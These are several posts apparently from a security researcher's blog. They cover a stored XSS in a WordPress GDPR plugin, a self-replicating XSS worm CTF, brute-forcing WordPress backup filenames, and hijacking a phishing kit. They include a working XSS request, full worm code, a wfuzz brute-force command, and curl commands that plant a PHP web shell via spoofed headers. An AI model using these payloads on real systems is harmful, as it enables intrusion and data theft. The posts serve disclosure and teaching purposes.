is pretty much a standard function to check several headers for proxies and stuff like that. But what was confusing is that there was a self::validateIpAddress($ipAddress)
call to validate the IP. The validateIpAddress()
function:
/**
* Ensures an ip address is both a valid IP and does not fall within
* a private network range.
*
* @param string $ipAddress
* @return bool
*/
public static function validateIpAddress($ipAddress = '') {
if (strtolower($ipAddress) === 'unknown') {
return false;
}
// Generate ipv4 network address
$ipAddress = ip2long($ipAddress);
// If the ip is set and not equivalent to 255.255.255.255
if ($ipAddress !== false && $ipAddress !== -1) {
/**
* Make sure to get unsigned long representation of ip
* due to discrepancies between 32 and 64 bit OSes and
* signed numbers (ints default to signed in PHP)
*/
$ipAddress = sprintf('%u', $ipAddress);
// Do private network range checking
if ($ipAddress >= 0 && $ipAddress <= 50331647) return false;
if ($ipAddress >= 167772160 && $ipAddress <= 184549375) return false;
if ($ipAddress >= 2130706432 && $ipAddress <= 2147483647) return false;
if ($ipAddress >= 2851995648 && $ipAddress <= 2852061183) return false;
if ($ipAddress >= 2886729728 && $ipAddress <= 2887778303) return false;
if ($ipAddress >= 3221225984 && $ipAddress <= 3221226239) return false;
if ($ipAddress >= 3232235520 && $ipAddress <= 3232301055) return false;
if ($ipAddress >= 4294967040) return false;
}
return true;
}
After looking at the code for a longer time than I would like to admit, I realized that the whole logic is fundamentally flawed. The interesting part is the ip2long function, which generates a long integer representation of IPv4, which is then later checked via a list of known network ranges. But when the input is invalid, it will return false: ip2long ( string $ip ) : int|false
. The validateIpAddress()
is never catching that, so the valid IP is being validated, but the invalid IP will always return true, resulting in the payload stored in the database. And because the developer was confident in the check, it is never escaped when retrieved from the database and rendered in the admin dashboard.
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 0.0.0.0:31337
X-Forwarded-For: 1.1.1.1"><img src=x onerror=alert(1)>
action=wpgdprc_process_action&security=cccf5a60ec&data={"type":"access_request","email":"xss@example.com","consent":true}
Fix for the vulnerability was released in version 1.5.6 via adding to the check:
if ($ipAddress === false) {
return false;
}
The user input is now correctly escaped, but the IP address column is still varchar(255)
. Also, only the PATCH version was incremented, instead of the MINOR version, so it’s hard to track the updated plugins’ percentage via the advanced WordPress statistic. I believe it was a correct decision, but bumping it to 1.6
would be much better from the security point of view.
When checking WPScan to verify that it’s not a known vulnerability, I realized that this is, in fact, the (in)famous GDPR plugin, which resulted in a full compromise of hundreds/thousands of websites back in 2018. But I must say that I was impressed by the fast response & fix from the developer. Unfortunately for me, stored XSS is not a valid finding for Detectify. I did a quick recon for HackerOne in-scope items but didn’t find any hit. Maybe I will be lucky next time :)
By observing a spike in the “Downloads per day” graph during the week after the fix release, we can estimate that approximately ~50k websites updated the plugin, which is about 1/4 of all active installations. The stats are somewhat consistent with past releases and could indicate that we won’t see any more websites updating to the latest version, so it might be a good idea to spread the news.
Date | Downloads |
---|---|
2021-02-15 | 23541 |
2021-02-16 | 12869 |
2021-02-17 | 5757 |
2021-02-18 | 3964 |
2021-02-19 | 3107 |
2021-02-20 | 2076 |
2021-02-21 | 1808 |
2021-02-22 | 3192 |
wpscan.com/vulnerability/69655879-9fd5-49a3-96ce-81e43b8d8438
]]>When the whole covid-19 thing started, I was somehow interested in looking at various coronavirus world maps and watching the exponential growth of the pandemic unfold. It reminded me of the (in)famous MySpace; “Samy worm” by Samy Kamkar. For those of you who never heard about it, it was the first publicly released self-propagating cross-site scripting worm, onto MySpace, in 2005. The worm was able to infect over one million users had run the payload in one day.
Since then, we have seen some other XSS worms, for example, on Yahoo, Twitter or Orkut. But nothing at the scale of The MySpace worm.
In 2008, @RSnake published “Diminutive XSS Worm Replication Contest” on sla.ckers.org. It was an awesome idea, but there was some backlash as well :(
But why am I talking about this? Well, in 2008, I was 16 years old. I knew only the basic English, but I was lucky enough to be mentored by the best hackers in the Czechia at the time. Couple of months after the RSnake’s contest, one member of our community took the idea and created an interface where we could test our XSS worms and compete with others. It looked like this:
There were 200 bot accounts and we (~4 people) scored points by infecting them with our worms and marking them with our color & nick via CSRF. You can still find the pieces of the original web archived here and the XSS worm source here. It may sound weird, but this “contest”, writing XSS worms and payloads to steal cookies, is one of my happiest childhood memories :)
So one evening, when I was checking the coronavirus map, I had a big flashback and immediately started coding the remastered version. The things is, I’m not a developer, so it took quite some time. In May 2020, I had a working Proof of Concept, which looked like this:
At that point, I realized that it’s scalable and I might be able to pull it off and write a CTF style contest for our upcoming OWASP Czech Chapter meeting. I did some research and decided to go with a simple Python Flask application and a cluster of puppeteer workers for the bots.
Then the situation with covid got worse, and we had to postpone the OWASP meeting. We had to postpone multiple times and eventually cancel the whole thing because of the lockdown. On the bright side, I had plenty of time for coding and polishing. So how does it work?
It’s somehow simple. The user will register with the nickname and team color. They are then presented with a simple interface to send messages to bots. But here is a catch, each user has a limit of 13 messages which could be sent. Based on the swagger documentation, they need to write the XSS worm, which will leverage two CSRFs. One to change the bot’s color and the other to self propagate via the bot’s unlimited private messages. The point of a limited number of messages is to force the users to design an efficient infection algorithm, which will spread exponentially.
There is a grid of 1k boxes, which helps to visualize the bots. If they are infected, and by whom. Users are scoring points by infecting and reinfecting the bots and marking them with their team color.
The puppeteer cluster is then reading the last received messages of each bot in a random sequence every X minutes. The cluster code looks like this, it’s just going through the array in random order, authenticated with cookies:
const { Cluster } = require('puppeteer-cluster');
(async () => {
const cluster = await Cluster.launch({
concurrency: Cluster.CONCURRENCY_CONTEXT,
maxConcurrency: 5,
// puppeteerOptions: { headless: false },
// puppeteerOptions: { args: ['--no-sandbox'] },
timeout: 666,
monitor: true,
});
await cluster.task(async ({ page, data }) => {
const { url, id } = data;
await page.setCookie({
'value':id,
'domain': 'xssworm.dev',
'expires': Date.now() / 1000 + 10,
'name': '31p475~Yr37748-35r0h~7c3rr0C-ID',
'httpOnly': true
});
await page.setCookie({
'value':'correct-horse-battery-staple',
'domain': 'xssworm.dev',
'expires': Date.now() / 1000 + 10,
'name': 'secret',
'httpOnly': true
});
await page.goto(url);
await page.waitFor(666);
//const screen = await page.screenshot();
// Store screenshot, do something else
});
var array = Array.from({length: 1001}, (_, i) => [i, Math.random()]).sort((a, b) => a[1] - b[1]).map(([n, r]) => n)
for (var i = 0; i < array.length; i++) {
//console.log(array[i]);
var url = "https://xssworm.dev/read-message?id="+array[i];
cluster.queue({url, id:""+array[i]+""});
// many more pages
}
await cluster.idle();
await cluster.close();
})();
There are some basic rules for users. They should be able to write the self-propagating code in just 13 tries. Once their worm hits exponential growth, they should be able to infect most of the victims.
After the registration, users are presented with Swagger documentation. They were supposed to write a code, which will send two POST requests, one to change to the color of the victim, the other to replicate its code and spread to another victim. The tricky part was application/x-www-form-urlencoded, as most of the contestants struggled to get the encoding right, so either the ‘+’ sign was stripped, or the ‘#’ representing hex value of the color was double encoded.
Only one player was able to write the functional self-spreading XSS worm in time and eventually won the whole competition. They designed three different algorithms, as they could register again and resend the updated version to 13 victims.
There is a lot of things to improve in my code. I used a rather strict Content Security Policy. The whole deployment should be in docker. I was even thinking about implementing CSRF tokens and Twitter OAuth. For more experienced users, XSS protection to bypass would be ideal. The one thing that I struggled with the most was how to prevent a race condition and how to protect the number of messages that the user can send :( But anyway, I’m glad that people enjoyed the challenge, even in those hard times.
Here you can check my Proof of Concept of the worm:
<script id="xss_worm">
// XSS worm .dev
// Self-replication contest
// Proof of Concept v1.0
var victims = 1000;
var team_color = "#550bb1";
var url = "https://xssworm.dev";
var infection_code = "<script id=\"xss_worm\">"+self_propagation()+"<\/script>";
infect_victim(team_color);
while (true) {
var victim_id = get_random_victim(victims);
spread_infection(victim_id,infection_code);
}
function get_random_victim(accounts_count) {
return Math.floor((Math.random() * accounts_count) + 1);
}
function infect_victim(color) {
var xhr = new XMLHttpRequest();
var params = "color="+color;
xhr.open("POST", url+"/update", true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send(params);
}
function self_propagation(){
return document.getElementById("xss_worm").innerHTML;
}
function spread_infection(id,infection_code) {
var xhr = new XMLHttpRequest();
var params = "id="+id+"&msg="+encodeURIComponent(infection_code);
xhr.open("POST", url+"/send-message", true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send(params);
}
</script>
You can check and try the website, as I will keep the infrastructure alive for a while, or you can deploy it locally, as the whole thing is open-source. I’m a little bit ashamed of my programming skills, but here you go: https://github.com/vavkamil/XSSworm.dev
]]>A long time ago, I made a stupid decision to use WordPress for this blog about offensive website security. Since then, I learned a lot. I will be releasing a plugin to defend against XML-RPC attacks and guide how to generate a static HTML site in upcoming weeks.
But today I would like to share an interesting vulnerability that I found in a popular WordPress plugin with 2+ million active installations. I was looking for an easy-to-use backup plugin and All-in-One WP Migration by ServMask seemed like a good choice.
This plugin exports your WordPress website including the database, media files, plugins and themes with no technical knowledge required. Move, transfer, copy, migrate, and backup a site with 1-click. Quick, easy, and reliable.
All-in-One WP Migration plugin description
After installing the plugin and creating the first backup, the filename didn't look too random. I was wondering if it could be guessed by an attacker and somehow downloaded without the authenticated access.
While checking the code, I found out that it's just a domain-date-time-rand(100,999).wpress and the backup itself was publicly accessible via vavkamil.cz/wp-content/ai1wm-backups/vavkamil.cz-20200324-214633-123.wpress
This seemed bad, but it would still require a huge amount of requests and pure luck to brute-force it. In the "wp-content/ai1wm-backups" folder, there were three additional files preventing directory listing:
Back then, I didn't know what a "web.config" is for, but I was able to download it. There was nothing useful, it's basically .htaccess for Microsoft IIS server. Normally I would probably stop there, but I just finished reading Permanent Record by Edward Snowden and remembered about the metadata :)
By downloading the web.config file and checking the Last-Modified metadata header, we can determine the exact date a time when the plugin was installed. Let's assume the user will install the All-in-One WP Migration plugin and create a backup within the first 10 minutes after the installation. The attacker can brute-force the backup file name with approximately 600k requests.
I quickly wrote a simple python script to extract the metadata and used wfuzz as a proof of concept:
wfuzz -c -z range,33-59 -z range,100-999 -X HEAD --sc 200 https://vavkamil.cz/wp-content/ai1wm-backups/vavkamil.cz-20200324-2146FUZZ-FUZ2Z.wpress
The wfuzz parameters can be slightly modified to add a reasonable delay between the installation and first backup creation, or you can just try pure luck.
Now when the attacker can determine the backup file name and download it, he can use .wpress extractor to dump the database content from the archive, or just install the plugin to a fresh website and import the backup.
It's worth mentioning that even if you uninstalled the plugin, the "ai1wm-backups" folder with all the backups was not deleted, and therefore you may still be vulnerable.
I scanned hackerone/bugcrowd scope for bug bounty hunting purposes and was able to find ~20 blogs with the plugin installed, but I wasn't able to exploit any (mainly as I didn't want to bother them with a huge amount of requests). On the other hand, I exploited a hand-full of websites during the responsible disclosure among my clients, and this blog was also vulnerable/exploitable.
I reported the issue to the author and it was quickly fixed in version 7.15 (Exclude web.config and .htaccess direct access from each other). That means that it's no longer possible to download .htaccess file from IIS and web.config file from Apache. With the next updates, there were introduced some changes and the backup file name is more random.
Timeline:
UPDATE: 17th January 2020: Another landing page disabled.
UPDATE: 15th January 2020: I posted this to reddit.com/r/hacking and it seems like the mods didn't like it, they consider my blog post as a self-promotion and spam. Thank you!
You have been permanently banned from participating in r/hacking
You have been permanently banned from participating in r/ActLikeYouBelong
You have been permanently banned from participating in r/AskNetsec
Today was a good day, I received a phishing email to by Protonmail address. I don't have a copy of the email, as I reported it and later deleted it as spam. Thankfully, other security research took screenshots yesterday:
The phishing mail was included a Bitly link (URL shortener). The nice thing about Bitly is that you can add a plus (+) character on the end of URL and it will show you how many people clicked the link and what is the location of redirect:
More than 100 people clicked the link when I received the phishing email. I was a little bit bored, so I started poking around a little bit. I quickly found a directory listing with full source code:
The landing page was written in PHP, it was kinda a generic one, nothing unordinary, except a blocker.php
file. It was a code to block security researchers and malware hunters based on IP ranges and user-agent strings. If any of the above matched, the IP was denied access in .htaccess
and added to a file badbot.txt
for a further investigation.
The fourth line got my attention, as it was very unique:
$ipa = $_SERVER['HTTP_CLIENT_IP']? $_SERVER['HTTP_CLIENT_IP'] : ($_SERVER['HTTP_X_FORWARDED_FOR'] ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR'] );
$useragent = $_SERVER['HTTP_USER_AGENT'];
if(isset($_POST['gotcha'])){
blockBot($ipa);
}
The thing in web security is, you should never trust user input. In this case, you can spoof both HTTP_CLIENT_IP
and HTTP_X_FORWARDED_FOR
headers.
If you called the blocker.php
script with a POST request and gotcha
parameter, the IP address was blocked:
function blockBot($ip){
$bot = 'deny from '.$ip;
$myfile = file_put_contents('.htaccess', PHP_EOL.$bot.PHP_EOL , FILE_APPEND | LOCK_EX);
header('HTTP/1.0 404 Not Found');
die("<h1>404 Not Found</h1>The page that you have requested could not be found.");
}
If the user-agent matched any array value like InfoSec, Kaspersky, ...
, the IP was added to badbot.txt
:
foreach($bad as $zbal) {
if(stripos($useragent,$zbal) !== false) {
file_put_contents('badbot.txt', $ipa, FILE_APPEND | LOCK_EX);
blockBot($ipa);
}
}
So I quickly figured out that I can insert PHP shell to badbot.txt
and force .htaccess to execute .txt files as PHP. The trick from the 2000s used to hack insecure PHP uploads :)
Inserting PHP web shell into badbot.txt
(learned this one from Sucuri):
curl $url/blocker.php -H "CLIENT-IP: <?php extract($_REQUEST);$a($b); ?> " -H "User-agent: InfoSec"
Forcing Apache to execute .txt as PHP via .htaccess:
curl $url/blocker.php -H "CLIENT-IP: \r\nAddType application/x-httpd-php .txt\r\n" -H "User-agent: google" --data "gotcha=1"
This can be a very nice CTF challenge, full source-code here: https://gist.github.com/vavkamil/b115ef829329f9fd3876c077e843641b
In the end, I was able to take down the phishing infrastructure in less than 30 minutes, and maybe saved someone from a compromise. Mess with the best, die like the rest!
Indicators of compromise (IoC):
OWASP Czech Chapter Meeting, Dec 11, 2019 ~ Brno
/assets/img/2019/12/an-introduction-to-the-router-exploit-kits.pdf
2019-12-11-Kamil Vavra - An introduction to the router exploit kits2019-12-11- from Czech OWASP chapter on Vimeo.
]]>